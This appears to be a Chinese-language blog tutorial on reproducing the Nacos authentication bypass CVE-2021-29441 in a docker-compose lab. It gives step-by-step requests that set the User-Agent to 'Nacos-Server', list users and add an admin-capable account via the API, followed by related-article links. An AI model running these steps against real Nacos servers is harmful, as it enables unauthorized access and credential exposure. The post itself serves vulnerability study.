Nacos 认证绕过漏洞（CVE-2021-29441）

Nacos是阿里巴巴推出的一个新开源项目，是一个更易于构建云原生应用的动态服务发现，配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos提供了一组简单易用的特性集，可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时，会判断请求的user-agent是否为"Nacos-Server"，如果是的话则不进行任何认证。开发者原意时用来处理一些服务端对服务端的请求。但是由于配置的过于简单，并且将协商好的user-agent设置为Nacos-Server，直接硬编码在了代码里，导致了漏洞的出现。并且利用这个未授权漏洞，攻击者可以获取到用户名密码等敏感信息。

漏洞环境搭建

cd     /nacos/CVE-2021-29441/
docker-compose up -d
docker-compose config

环境运行后，会开放3306、8848、9848、9555端口，在本次漏洞利用中，我们只需要用到8848端口，即web访问端口。执行漏洞验证过程时，请先访问8848端口，确认开放，某些情况下nacos服务会启动失败（无法连接数据库导致），可以重启所有服务

docker-compose restart nacos

漏洞复现

1. 修改User-Agent的值为Nacos-Server到请求包中
2. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9查看状态码是否为200，且内容中是否包含pageItems
   
3. 使用POST方式访问http://target:8848/nacos/v1/auth/users?username=test&password=test添加一个新用户
   
4. 访问http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9获取已有的用户列表
   
5. 访问http://target:8848/nacos/，使用添加的新用户(test/test)进行登录
   

本栏目推荐文章
• OFBiz RCE漏洞复现（CVE-2023-51467）
• NACOS安装
• nacos开启鉴权配置
• Docker安装nacos（配置文件映射）
• 漏洞扫描以识别可能使企业面临网络威胁的安全漏洞
• 渗透测试，找出各种潜在的漏洞
• nacos for k8s
• Nacos配置管理（七）
• Nacos注册中心（六）
• CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞

漏洞 Nacos漏洞nacos 漏洞 问题nacos 漏洞 身份认证 身份nacos 漏洞actuator nacos nacos集群raft反序列化漏洞 修复 nacos nacos2 docker nacos nacos1 8nacos